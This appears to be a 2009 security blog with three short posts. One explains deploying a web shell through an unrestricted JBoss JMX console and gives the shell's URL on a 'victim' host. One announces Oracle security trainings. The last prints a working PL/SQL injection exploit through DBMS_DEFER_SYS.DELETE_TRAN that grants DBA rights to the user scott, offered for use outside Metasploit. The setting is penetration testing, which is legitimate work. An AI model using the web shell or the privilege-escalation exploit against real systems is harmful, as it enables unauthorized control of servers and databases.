Often while doing Internal Infrastructure assessments, its common to find unrestricted access to JBOSS JMX console. This web interface allows deployment of arbitrary war files. Here is an excellent article describing the process:
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf
Here is a war file, ready to use: cmd.war (zipped)
Once deployed check for this file on the vulnerable jboss: http://victim:8080/cmd/cmd.jsp
Happy Hacking 
I will be conducting 2 one day Oracle Security Trainings in november and december.
November 19th 2009:
Venue: New Delhi, India
Course Agenda/Outline: http://securitybyte.org/index.php/trainings/sessions/1-day-tracks/62-hacking-and-securing-oracle-database-.html
At Owasp India, I will also be giving a talk. The talk is titled, ‘Hacking Oracle From Web’. Here I will discuss some advanced techniques for exploiting SQL/PLSQL Injections targeting Oracle back-end along with the security problems with other Oracle components such as Oracle Application Servers, Application Portal, Secure Back-up etc.
December 14th 2009
Venue: 7Safe, Sawston, Cambridge, U.K
Course Agenda/Outline:
http://7safe.com/oracle_database_security_training_course.htm
The exploit for this vulnerability is in metasploit, but i could not find it on milw0rm or at any other exploit repository. This was patched in CPU July 2008
So, if you need to use it outside metasploit, here it is:
DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,’declare pragma autonomous_transaction; begin execute immediate ”grant dba to scott”;commit;end;’,0);
DBMS_DEFER_SYS.DELETE_TRAN(’aaaaaa’,'a” and dbms_sql.execute(’||D||’)=1–’);
end;
